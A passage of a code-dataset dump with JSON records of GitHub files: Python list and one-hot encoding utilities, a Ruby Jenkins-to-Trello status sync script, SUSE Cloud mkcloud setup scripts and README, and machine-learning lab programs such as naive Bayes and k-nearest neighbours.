2, 3])\n [1, 2, 3, 1]\n >> drop_tail_until(4, [1, 2, 3, 1, 2, 3])\n [1, 2, 3, 1, 2, 3]\n\n Args:\n x (obj): The stopping value for dropping elements.\n\n xs (list): The list to drop values from.\n\n Returns:\n A copy of `xs` with anything after the right-most `x` value removed.\n \"\"\"\n last = rfind(x, xs)\n if last == None:\n return xs[:]\n return xs[:last + 1]\n\ndef take(n, xs):\n \"\"\"Takes the first `n` elements of `xs`.\n\n This is useful when `xs` is a generator.\n\n Example:\n >> gen = (i for i in range(5))\n >> take(3, gen)\n [0, 1, 2]\n >> take(2, gen)\n [3, 4]\n >> take(1, gen)\n []\n\n Args:\n n (int): The number of items to take from `xs`.\n\n xs (sequence): The sequence to take items from.\n\n Returns:\n A list of the first `n` items in `xs`. If `xs` doesn't have\n enough items then as many as can be drawn will be returned.\n \"\"\"\n return [x for (_, x) in zip(range(n), xs)]\n\ndef to_generator(xs):\n \"\"\" Converts a sequence to a generator. \"\"\"\n return (x for x in xs)\n" }, { "alpha_fraction": 0.6142454147338867, "alphanum_fraction": 0.6170662641525269, "avg_line_length": 31.976743698120117, "blob_id": "7ed02be6544bf0993ece7485e57c354261f34769", "content_id": "6fba4ceca12cf07eebd6918ce2daaa1959cec760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1418, "license_type": "no_license", "max_line_length": 79, "num_lines": 43, "path": "/src/util/one_hot_encoding.py", "repo_name": "stevekrenzel/modeled_encryption", "src_encoding": "UTF-8", "text": "from numpy import zeros, argmax, array\nimport numpy as np\n\ndef one_hot_encoding(xs, classes):\n \"\"\"Given a list of values, converts them to one-hot encoding.\n\n One-hot encoding is an encoding where if you have N distinct possible\n classes, the value gets encoded as an array of size N where all values are\n zero except for the index corresponding to the class of the current value.\n\n Example:\n >> one_hot_encoding([0, 1, 2], range(3))\n [[ True, False, False],\n [False, True, False],\n [False, False, True]]\n\n >> one_hot_encoding(\"ace\", \"abcde\")\n [[ True, False, False, False, False],\n [False, False, True, False, False],\n [False, False, False, False, True]]\n\n Args:\n xs (list): The list of values to encode.\n\n classes (sequence): A sequence containing one of each possible class.\n\n Returns (numpy.array(bool)):\n A two-dimensional numpy array where each row contains an encoded value.\n\n Raises:\n ValueError: If a value is present in `xs` that isn't in `classes`.\n \"\"\"\n # Maps a class to it's corresponding index\n lookup = {x:i for i, x in enumerate(classes)}\n\n X = zeros((len(xs), len(classes)), dtype=np.bool)\n for i, x in enumerate(xs):\n if x not in lookup:\n raise ValueError(\"Value '%s' is not present in `classes`\" % (x))\n\n X[i, lookup[x]] = True\n\n return X\n" } ]
29
SergeiKo42/YandexTZ
https://github.com/SergeiKo42/YandexTZ
5d32c05f6ea77e01976db808d4b4baa0bab96a56
8641da4b85b804a515049da556db088b0db3a92a
6bef6637cf8fd1b2d043afaf17701c8ba61a900d
refs/heads/master
2020-08-24T23:27:26.421505
2019-10-22T23:32:32
2019-10-22T23:32:32
216,926,993
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5691244006156921, "alphanum_fraction": 0.5702764987945557, "avg_line_length": 27, "blob_id": "a58e3b87ef0e249cb0954c80cc7ab64025981ddc", "content_id": "be7a2f9bc493ae29a7eb37b47510857af5c71650", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 868, "license_type": "no_license", "max_line_length": 95, "num_lines": 31, "path": "/main.py", "repo_name": "SergeiKo42/YandexTZ", "src_encoding": "UTF-8", "text": "import json\nimport unittest\n\n\nclass TestJsons(unittest.TestCase):\n orig_json = []\n out = {}\n\n def test_main(self):\n reconstructed_json = []\n for j in self.out:\n for k in out[j]:\n reconstructed_json.append({'shop': j, 'product': k})\n sorted_orig_json = sorted(self.orig_json, key=lambda l: l['shop'])\n sorted_reconstructed_json = sorted(reconstructed_json, key=lambda k: k['shop'])\n self.assertEqual(sorted_orig_json, sorted_reconstructed_json)\n\n\nif __name__ == '__main__':\n\n with open('task_2.json', 'r') as f:\n json = json.load(f)\n out = {}\n for i in json:\n out[i['shop']] = i['shop'] in out and out[i['shop']] + [i['product']] or [i['product']]\n print(\"Resulted Array: \\n %s\" % out)\n\n # Test\n TestJsons.orig_json = json\n TestJsons.out = out\n unittest.main()\n" }, { "alpha_fraction": 0.7882353067398071, "alphanum_fraction": 0.7882353067398071, "avg_line_length": 16, "blob_id": "cd9f84756d8edba09f7f9e00e48c1369c578ec83", "content_id": "71f804b41fc59762eeb0b660bffc29a30ce31677", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 146, "license_type": "no_license", "max_line_length": 43, "num_lines": 5, "path": "/README.md", "repo_name": "SergeiKo42/YandexTZ", "src_encoding": "UTF-8", "text": "# Yandex\n\nЗадача решается пятю строчками (или меньше)\n\nДобавил еще тест для проверки\n" } ]
2
VibAltekar/akhillinit
https://github.com/VibAltekar/akhillinit
aac74a2ed2a476a77daed96a0cf6acc16d2e9bd2
461173a42a60f43b4f0205bea9c42ae7487a2e44
d40fc0163845f106cc712ea71d04ae7a46e83c64
refs/heads/master
2021-09-14T19:24:33.409948
2018-05-17T22:06:20
2018-05-17T22:06:20
105,838,017
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5411471128463745, "alphanum_fraction": 0.561097264289856, "avg_line_length": 22.58823585510254, "blob_id": "4681882cb7aeadadc9d4fb2ab779dd1e4beb8385", "content_id": "354f884f92c63dfe502a9909351bbc029d7a1ded", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 401, "license_type": "no_license", "max_line_length": 86, "num_lines": 17, "path": "/temp.py", "repo_name": "VibAltekar/akhillinit", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, url_for, request, session, redirect, jsonify\n\n\nimport os\napp = Flask(__name__)\n\n@app.route(\"/\",methods=[\"GET\",\"POST\"])\ndef hello():\n if request.method == \"POST\":\n a = request.json\n print(a)\n values = a[\"hi\"]\n os.system(\"say '\" + values + \"'\")\n return \"Hello\"\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=6969)\n" } ]
1
marticongost/woost.extensions.notices
https://github.com/marticongost/woost.extensions.notices
49a0471b899bdf48c2c7cb563c125b0f611170fa
2fb728236731a7019750c090de7a08237bcd08ac
53b57884e2fc81cef3310285e22b56f95c33000e
refs/heads/master
2020-08-16T17:15:24.478036
2019-07-25T10:43:52
2019-07-25T10:43:52
215,530,025
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7727272510528564, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 23.33333396911621, "blob_id": "cf6d637395f3cf77806cd841e365b69d541665b4", "content_id": "f2172bb58dffae991dc30e8a6e8ecac521a08ca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 61, "num_lines": 9, "path": "/woost/extensions/notices/settings.py", "repo_name": "marticongost/woost.extensions.notices", "src_encoding": "UTF-8", "text": "\"\"\"\n\n.. moduleauthor:: Martí Congost <marti.congost@whads.com>\n\"\"\"\nfrom cocktail import schema\nfrom cocktail.translations import translations\nfrom woost.models import add_setting\n\ntranslations.load_bundle(\"woost.extensions.notices.settings\")\n\n" }, { "alpha_fraction": 0.641791045665741, "alphanum_fraction": 0.641791045665741, "avg_line_length": 18.647058486938477, "blob_id": "0f971af6d2ac149475cb8e5679d3518c6eaf4ecf", "content_id": "7f2eaed2f8a32bb80ec31bce52d3a9cbb9177612", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "no_license", "max_line_length": 63, "num_lines": 17, "path": "/woost/extensions/notices/installation.py", "repo_name": "marticongost/woost.extensions.notices", "src_encoding": "UTF-8", "text": "\"\"\"\n\n.. moduleauthor:: Martí Congost <marti.congost@whads.com>\n\"\"\"\nfrom woost.models import ExtensionAssets, BlocksCatalog\n\n\ndef install():\n \"\"\"Creates the assets required by the notices extension.\"\"\"\n\n assets = ExtensionAssets(\"notices\")\n\n assets.require(\n BlocksCatalog,\n \"blocks_catalog\",\n title = assets.TRANSLATIONS\n )\n\n" }, { "alpha_fraction": 0.6110183596611023, "alphanum_fraction": 0.6126878261566162, "avg_line_length": 21.148147583007812, "blob_id": "1ddf6ba4ce92acb2219d72bd13b5d81a386e35a2", "content_id": "7e852b804ee6666b64a822f935c7ec86209eb5b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 599, "license_type": "no_license", "max_line_length": 55, "num_lines": 27, "path": "/woost/extensions/notices/migration.py", "repo_name": "marticongost/woost.extensions.notices", "src_encoding": "UTF-8", "text": "\"\"\"\n\n.. moduleauthor:: Martí Congost <marti.congost@whads.com>\n\"\"\"\nfrom cocktail.persistence import migration_step\nfrom woost.models import BlocksCatalog\n\n\n@migration_step\ndef preserve_woost2_data(e):\n\n from woost.models import Website\n\n catalog = BlocksCatalog.require_instance(\n qname=\"woost.extensions.notices.blocks_catalog\"\n )\n\n for website in Website.select():\n blocks = set()\n try:\n value = website._notices\n except AttributeError:\n pass\n else:\n del website._notices\n if value:\n catalog.blocks.extend(value)\n\n" } ]
3
matrixik/automation
https://github.com/matrixik/automation
246ffb20a148757a4071d64e0ebfa8a151f19abb
023485961465536988b4ff5698204f44e047bd9f
fab2579375178d47ad4ba123d46aa9d7e54348d8
refs/heads/master
2021-01-12T05:35:49.194947
2016-12-22T11:16:30
2016-12-22T11:16:30
77,140,386
1
0
null
2016-12-22T11:49:56
2016-12-09T07:19:31
2016-12-22T11:16:31
null
[ { "alpha_fraction": 0.6802431344985962, "alphanum_fraction": 0.7063829898834229, "avg_line_length": 32.53061294555664, "blob_id": "7cfcaab74f57235fb46426de248b87598248ea6c", "content_id": "10bc634c858746fa096fc9b5b1a224dab32ffe8d", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1645, "license_type": "permissive", "max_line_length": 86, "num_lines": 49, "path": "/scripts/jtsync/test_jtsync", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\necho \"set (Cloud 7) cloud-mkcloud7-job-4nodes-linuxbridge-x86-64 to failed\"\nbundle exec jtsync.rb --ci suse --job cloud-mkcloud7-job-4nodes-linuxbridge-x86-64 1\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"set (Cloud 7) cloud-mkcloud7-job-4nodes-linuxbridge-x86-64 to success\"\nbundle exec jtsync.rb --ci suse --job cloud-mkcloud7-job-4nodes-linuxbridge-x86-64 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: matrix job (cloud) to success\"\nbundle exec jtsync.rb --ci suse --matrix crowbar-trackupstream,Devel:Cloud:7:Staging 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: matrix job (cloud) to failed\"\nbundle exec jtsync.rb --ci suse --matrix crowbar-trackupstream,Devel:Cloud:7:Staging 1\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: matrix job (openstack)\"\nbundle exec jtsync.rb --ci opensuse --matrix openstack-cleanvm,Juno 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: search non existing job\"\nbundle exec jtsync.rb --ci opensuse --matrix openstack-cleannothing,Juno 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: invalid returncode\"\nbundle exec jtsync.rb --ci opensuse --matrix openstack-cleanvm,Juno a\necho \"returncode: $?\"\nread -p \"Press any key to continue... \" -n1 -s\necho \"\"\n\necho \"test: invalid ci type\"\nbundle exec jtsync.rb --ci foobar --matrix openstack-cleanvm,Juno 0\necho \"returncode: $?\"\nread -p \"Press any key to continue... 
\" -n1 -s\necho \"\"\n\n\n" }, { "alpha_fraction": 0.6417100429534912, "alphanum_fraction": 0.6451823115348816, "avg_line_length": 23.25263214111328, "blob_id": "fa50e690b7375933d144c30f00a7ac5968c5fe40", "content_id": "2a6eabf5691875d37b656a3c3eec479f2b2b0784", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 4608, "license_type": "permissive", "max_line_length": 98, "num_lines": 190, "path": "/scripts/jtsync/jtsync.rb", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env ruby\n#\n# Copyright 2016, SUSE Linux GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nrequire 'trello'\nrequire 'netrc'\nrequire 'optparse'\nrequire 'ostruct'\n\nTRELLO_BOARD = 'ywSqlQpZ'.freeze\n\nmodule Job\n class Mapping\n attr_reader :name\n attr_reader :project\n attr_reader :retcode\n\n STATUS_MAPPING = {\n '0' => 'successful',\n '1' => 'failed'\n }.freeze\n\n def initialize(name, project, retcode)\n @name = name\n @project = project\n @retcode = retcode\n end\n\n def status\n raise \"Unknown returncode '#{retcode}'\" unless STATUS_MAPPING.key? retcode\n STATUS_MAPPING[retcode]\n end\n end\n\n class SuseNormal < Mapping\n def card_name\n name\n end\n\n def list_name\n version = name.split('-')[1]\n \"Cloud #{version[-1, 1]}\"\n end\n end\n\n class SuseMatrix < Mapping\n def version\n project.split(':')[2]\n end\n\n def card_name\n \"C#{version} #{name}\"\n end\n\n def list_name\n \"Cloud #{version}\"\n end\n end\n\n class OpenSuseMatrix < Mapping\n def card_name\n card = name.gsub('openstack-', '')\n \"#{card}: #{project}\"\n end\n\n def list_name\n 'OpenStack'\n end\n end\n\n MAPPING = {\n suse: {\n normal: SuseNormal,\n matrix: SuseMatrix\n },\n opensuse: {\n matrix: OpenSuseMatrix\n }\n }.freeze\n\n def self.for(service, jobtype, name, project, status)\n raise \"No mapping provided for #{service}/#{jobtype}\" unless MAPPING[service].key? jobtype\n MAPPING[service][jobtype].new(name, project, status)\n end\nend\n\ndef credentials_from_netrc\n netrc = Netrc.read\n dev, member = netrc['api.trello.com']\n\n raise 'Could not find credentials!' if dev.nil? 
|| member.nil?\n\n OpenStruct.new(developer_token: dev, member_token: member)\nend\n\ndef parse_job_from_cli\n job = OpenStruct.new\n opts = OptionParser.new do |opt|\n opt.banner = 'Usage: jtsync --ci SERVICE (--matrix|--job) JOB_STATUS'\n opt.on('--ci SERVICE', [:suse, :opensuse], 'Which ci is used (suse or opensuse)') do |service|\n job.service = service\n end\n\n opt.on('--matrix NAME,PROJECT', Array, 'Set status of a matrix job') do |settings|\n job.type = :matrix\n job.project = settings[1]\n job.name = settings[0]\n end\n\n opt.on('--job NAME', 'Set status of a normal job') do |name|\n job.type = :normal\n job.name = name\n end\n end\n opts.order!\n raise 'Either job or matrix is required' if job.type.nil?\n\n Job.for(job.service, job.type, job.name, job.project, ARGV.pop)\nend\n\ndef board\n @trello_board ||= Trello::Board.find(TRELLO_BOARD)\nend\n\ndef notify_card_members(card)\n members = card.members.map do |m|\n '@' + Trello::Member.find(m.id).username\n end\n\n comment = card.add_comment(\"#{members.join(' ')}: card status changed\")\n comment_id = JSON.parse(comment)['id']\n\n card.comments.select do |c|\n c.action_id == comment_id\n end.map(&:delete)\nend\n\ndef update_card_label(card, job)\n label = board.labels.select { |l| l.name == job.status }.first\n raise \"Could not find label '#{job.status}'\" if label.nil?\n\n return if card.labels.include? label\n\n card.labels.each { |l| card.remove_label(l) }\n card.add_label(label)\nend\n\ndef find_card_for(job)\n list = board.lists.select { |l| l.name == job.list_name }.first\n raise \"Could not find list #{job.list_name}\" if list.nil?\n\n card = list.cards.select { |c| c.name == job.card_name }.first\n raise \"Could not find card matching #{job.card_name} in #{job.list_name}\" if card.nil?\n\n card\nend\n\n# run the script --------------------------------------------------------------\nbegin\n credentials = credentials_from_netrc\n job = parse_job_from_cli\n\n Trello.configure do |config|\n config.developer_public_key = credentials.developer_token\n config.member_token = credentials.member_token\n end\n\n card = find_card_for(job)\n update_card_label(card, job)\n notify_card_members(card)\n\nrescue RuntimeError => err\n puts(\"Running jtsync failed: #{err}\")\nrescue Netrc::Error => err\n puts(\"Could not fetch credentials: #{err}\")\nrescue => err\n puts(\"Script failed err was: #{err}\")\nend\n" }, { "alpha_fraction": 0.7670682668685913, "alphanum_fraction": 0.8072289228439331, "avg_line_length": 16.785715103149414, "blob_id": "640ca0fa5bf5f55edf8bc96965e8c806b33c6285", "content_id": "7c31a080fab38b81df53f78457ce8cb2b95c6e42", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 249, "license_type": "permissive", "max_line_length": 30, "num_lines": 14, "path": "/docs/basic-mkcloud-config.sh", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "#!/bin/bash\nunset PARALLEL\nunset cloudpv\nunset cloudsource\nunset nodenumber\nunset want_sles12sp1\n\nexport PARALLEL=yes\nexport cloudpv=/dev/loop0\nexport cloudsource=develcloud6\nexport nodenumber='2'\nexport want_sles12sp1=2\n\nexec /path/to/mkcloud \"$@\"\n" }, { "alpha_fraction": 0.6947368383407593, "alphanum_fraction": 0.6947368383407593, "avg_line_length": 33.54545593261719, "blob_id": "dcb73ed9c5bcdb5b36d0e23578de4559c0354d85", "content_id": "52a5591641625e56d2ec25525daa2be44c111184", "detected_licenses": [ "Apache-2.0", 
"LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 760, "license_type": "permissive", "max_line_length": 79, "num_lines": 22, "path": "/scripts/lib/libvirt/net-config", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport argparse\n\nimport libvirt_setup\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Create Admin Network Config\")\n parser.add_argument(\"cloud\", help=\"Name of the Cloud\")\n parser.add_argument(\"cloudbr\", help=\"Name of the Virtual bridge\")\n parser.add_argument(\"admingw\", help=\"IP Address of the Admin Gateway\")\n parser.add_argument(\"adminnetmask\", help=\"Netmask of the Admin Network\")\n parser.add_argument(\"cloudfqdn\", help=\"Name of the Cloud-FQDN\")\n parser.add_argument(\"adminip\", help=\"IP Address of the Admin Node\")\n parser.add_argument(\"forwardmode\", help=\"Forward Mode (e.g. nat)\")\n args = parser.parse_args()\n\n print(libvirt_setup.net_config(args))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6998822093009949, "alphanum_fraction": 0.7118963599205017, "avg_line_length": 30.44444465637207, "blob_id": "005a3c337a0f05093af3792ae7fca623524eba6c", "content_id": "c4fa2ee654ee9ce4be64729f2aa53a946335ef0e", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4245, "license_type": "permissive", "max_line_length": 145, "num_lines": 135, "path": "/mkcloudruns/README.md", "repo_name": "matrixik/automation", "src_encoding": "UTF-8", "text": "MkCloud Runs\n------------\n\n# Description\n\nRun multiple copies of various scenarios of SUSE OpenStack Cloud product\nusing mkcloud ([automation repository](https://github.com/SUSE-Cloud/automation)).\n\nThis repository is basically a wrapper which automates the boilerplate required\nto start mkcloud with the right configuration settings. 
Even for non-beginners\nthis boilerplate wrapper script should be really handy due to the overwhelming\namount of configuration options and environment variables used by mkcloud :|.\n\n- Inspiration:\n > I'm just too lazy.\n- The perfect world:\n > We do not need these scripts!\n\n# Deploying SUSE CLoud\n\nFollow these steps to deploy the required SUSE Cloud setup.\n\n## Initial Setup\n\n* Clone the repository\n* Setup up libvirt, KVM,LVM as per the automation repo, follow [this link](https://github.com/dguitarbite/automation/blob/master/docs/mkcloud.md)\n* Create a LVM drive either using dd or give it one partition from your disk\ndrive.\n* Create PV and VG give the VG name in the config file.\n\n### Libvirt\n\n* Check if `libvirtd` is running and if it isn't start it.\n\n ```\n $ sudo systemctl status libvirtd.service # to check the status\n $ sudo systemctl start libvirtd.service # to start the daemon\n ```\n\n It's recommended to configure libvirtd to start on boot.\n ```\n $ sudo systemctl enable libvirtd.service\n ```\n\n* Turn off the firewall, otherwise there are going to be conflicts with the\n rules added by `libvirt`.\n\n ```\n $ sudo service SuSEfirewall2 stop\n ```\n\n Disable the firewall service to prevent it from starting on boot.\n\n * Using systemd:\n ```\n $ sudo systemctl disable SuSEfirewall2\n ```\n * Using SysV:\n ```\n $ sudo service SuSEfirewall2 off\n ```\n\n### Setup storage for mkcloud.\n\n#### Using file as a disk.\n\n*Note:* Skip this step if you have a dedicated partition or disk for LVM.\n\nTo use mkcloud the following additional steps are needed:\n\n* Create a disk file where the virtual machines are going to be stored. The\n minimum recommended is 80 GB.\n\n ```\n $ fallocate -l 80G mkcloud.disk\n ```\n\n* Attach the created disk file to a loop device\n\n ```\n $ sudo losetup -f mkcloud.disk\n ```\n\n* Check the location of the loop device. Something like `/dev/loop0`.\n ```\n $ sudo losetup\n ```\n\n* Set the `cloudpv` variable in (mkcloudrun)[mkcloudrun] script for using this disk.\n - Ex: export cloudpv=/dev/loop0\n - Replace /dev/loop0 with your LVM partition if you want to use a dedicated PV.\n\n\n##Deploy SUSE Cloud\n\n* Configure storage options in the (mkcloudrun)[mkcloudrun] script. Read the comments under LVM.\n* Go to the required folder and run the script `*.mkcloud*`.\n* Ex.:\n ```\n $ cd mkcloudconfig/\n $ cp template user.cloud<ver>\n $ ...\n $ cd ..; sudo ./install_suse_cloud\n ```\n* Scripts are invoked in a screen sessions. The name of the screen session is taken from the name of your configuration file.\n* To monitor the given cloud deployment process join the screen session:\n ```\n $ screen -ls\n $ screen -x <screen_name>\n ```\n To move around in the screen session use the command `<C-R>-a, <tab number>`.\n **Note:** The screen session are mostly invoked as root user, try to use ``sudo screen`` or access as a root user.\n* Monitor the VMs via. virt-manager or virsh. Virt-manager should give you a GUI and easier to use for new users.\n* After the deployment access the dashboards:\n - Crowbar/Admin Dashboard:\n + URL: `http://192.168.52.10:3000` *For DevelCloud5.mkcloud1 only*\n + User: `crowbar` Pass: `crowbar`\n - OpenStack Dashboard:\n + URL: `http://192.168.52.81` *For DevelCloud5.mkcloud1 only*\n + Admin User: `admin` Pass: `crowbar`\n + OpenStack User: `crowbar` Pass: `crowbar`\n\n##Parallel Mkclouds\n\n* To find out the required IP addresses of the mkcloud steup, go through the\n mkcloudrun file in this folder. 
Usually the formual is good to guess the\nrequired IP addresses.\n* Crowbar admin IP is at xxx.10.\n* Ex: For `cloud number 5` the ip for admin node is 192.168.60.10\n\n##RoadMap\n\n* Add basic CLI to `install_suse_cloud`.\n* Modify the scripts based on others feedback and requirements.\n* Fix automation repository the right way so we do not need these scripts in the first place.\n" } ]
5
yashas123/VTU-15CSL76
https://github.com/yashas123/VTU-15CSL76
9c06c0d6a041450da95b0ecb0074db23d55269d9
c1dacbe1457844fea8acd4ebd87a1d3eb6d8f896
a039dc2e4eced98dd853d0d371b24ea6fed5094c
refs/heads/master
2020-09-16T02:40:10.306933
2019-11-23T17:09:32
2019-11-23T17:09:32
223,623,916
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7272727489471436, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 21, "blob_id": "31a076165521aefeb14da481d3c5e5facf902d56", "content_id": "e5591c9509b94625cb67d5e4f2a728b46816b6ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 29, "num_lines": 2, "path": "/README.md", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "# VTU-15CSL76\nMachine Learning Lab Programs\n" }, { "alpha_fraction": 0.6896359920501709, "alphanum_fraction": 0.6982495188713074, "avg_line_length": 32.644859313964844, "blob_id": "79adf9d71c275c8e14a9e8abd3ff3e38b245810a", "content_id": "8272a74320616febf92b6a873d97f3db865f7ffe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3599, "license_type": "no_license", "max_line_length": 83, "num_lines": 107, "path": "/Program5/p5.py", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "print(\"\\nNaive Bayes Classifier for concept learning problem\")\nimport csv\nimport random\nimport math\nimport operator\ndef safe_div(x,y):\n if y == 0:\n return 0\n return x/y\ndef loadCsv(filename):\n lines=csv.reader(open(filename))\n dataset=list(lines)\n for i in range(len(dataset)):\n dataset[i]=[float(x)for x in dataset[i]]\n return dataset\ndef splitDataset(dataset,splitRatio):\n trainSize =int(len(dataset)*splitRatio)\n trainSet=[]\n copy =list(dataset)\n i=0\n while len(trainSet)<trainSize:\n trainSet.append(copy.pop(i))\n return[trainSet,copy]\ndef separateByClass(dataset):\n separated={}\n for i in range(len(dataset)):\n vector=dataset[i]\n if(vector[-1]not in separated):\n separated[vector[-1]]=[]\n separated[vector[-1]].append(vector)\n return separated\ndef mean(numbers):\n return safe_div(sum(numbers),float(len(numbers)))\ndef stdev(numbers):\n avg=mean(numbers)\n variance = safe_div(sum([pow(x-avg,2) for x in numbers]),float(len(numbers)-1))\n return math.sqrt(variance)\ndef summarize(dataset):\n summaries = [(mean(attribute), stdev(attribute)) for attribute in zip(*dataset)]\n print(summaries)\n del summaries[-1]\n return summaries\ndef summarizeByClass(dataset):\n separated = separateByClass(dataset)\n summaries = {}\n for classValue, instances in separated.items(): \n summaries[classValue] = summarize(instances)\n return summaries\ndef calculateProbability(x, mean, stdev):\n exponent = math.exp(-safe_div(math.pow(x-mean,2),(2*math.pow(stdev,2))))\n final = safe_div(1,(math.sqrt(2*math.pi) * stdev)) * exponent\n return final\ndef calculateClassProbabilities(summaries, inputVector):\n probabilities = {}\n for classValue, classSummaries in summaries.items():\n probabilities[classValue] = 1\n for i in range(len(classSummaries)):\n mean, stdev = classSummaries[i]\n x = inputVector[i]\n probabilities[classValue] *= calculateProbability(x,mean,stdev)\n return probabilities\ndef predict(summaries, inputVector):\n probabilities = calculateClassProbabilities(summaries, inputVector)\n bestLabel, bestProb = None,-1\n for classValue, probability in probabilities.items():\n if bestLabel is None or probability > bestProb:\n bestProb = probability\n bestLabel = classValue\n return bestLabel\ndef getPredictions(summaries, testSet):\n predictions = []\n for i in range(len(testSet)):\n result = predict(summaries, testSet[i])\n predictions.append(result)\n return predictions\ndef getAccuracy(testSet, predictions):\n correct = 0\n for i in 
range(len(testSet)):\n if testSet[i][-1] == predictions[i]:\n correct += 1\n accuracy = safe_div(correct,float(len(testSet))) * 100.0\n return accuracy\ndef main():\n filename = 'pima-indians-diabetes.data.csv'\n splitRatio = 0.75\n dataset = loadCsv(filename)\n trainingSet, testSet = splitDataset(dataset, splitRatio)\n print('Split {0} rows into'.format(len(dataset)))\n print('Number of Training data: ' + (repr(len(trainingSet))))\n print('Number of Test Data: ' + (repr(len(testSet))))\n print(\"\\nThe Training set are:\")\n for x in trainingSet:\n print(x)\n print(\"\\nThe Test data set are:\")\n for x in testSet:\n print(x)\n summaries = summarizeByClass(trainingSet)\n predictions = getPredictions(summaries, testSet)\n actual = []\n for i in range(len(testSet)):\n vector = testSet[i]\n actual.append(vector[-1])\n print('Actual values: {0}%'.format(actual))\n print('Predictions: {0}%'.format(predictions))\n accuracy = getAccuracy(testSet, predictions)\n print('Accuracy: {0}%'.format(accuracy))\nmain()" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.756373941898346, "avg_line_length": 38.19444274902344, "blob_id": "1afd228894b15d24c5939ae579ab3736c076d739", "content_id": "2cd5d5699beef553d665135330aa6697675ee058", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 106, "num_lines": 36, "path": "/Program9/p9.py", "repo_name": "yashas123/VTU-15CSL76", "src_encoding": "UTF-8", "text": "# Write a program to implement k-Nearest Neighbour algorithm to classify the iris\n# data set. Print both correct and wrong predictions. Java/Python ML library\n# classes can be used for this problem. \n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as plt\n\n### Step 2 : Load the inbuilt data or the csv/excel file into pandas dataframe and clean the data # ln[66]\n\nfrom sklearn.datasets import load_iris\n\ndata = load_iris()\ndf = pd.DataFrame(data.data, columns=data.feature_names)\ndf['Class'] = data.target_names[data.target]\ndf.head()\nx = df.iloc[:,:-1].values\ny = df.Class.values\n\nprint(x[:5])\nprint(y[:5])\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2)\nfrom sklearn.neighbors import KNeighborsClassifier\nknn_classifier = KNeighborsClassifier(n_neighbors = 5)\nknn_classifier.fit(x_train, y_train)\nprediction = knn_classifier.predict(x_test)\nprint(prediction)\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nprint(\"Training accuracy Score is : \\n\", accuracy_score(y_train, knn_classifier.predict(x_train)))\nprint(\"Testing accuracy Score is : \\n\", accuracy_score(y_test, knn_classifier.predict(x_test)))\n\nprint(\"Training Confusion Matrix is : \\n\", confusion_matrix(y_train, knn_classifier.predict(x_train)))\nprint(\"Testing Confusion Matrix is : \\n\", confusion_matrix(y_test, knn_classifier.predict(x_test)))\n\n" }, { "alpha_fraction": 0.5916473269462585, "alphanum_fraction": 0.5988656878471375, "avg_line_length": 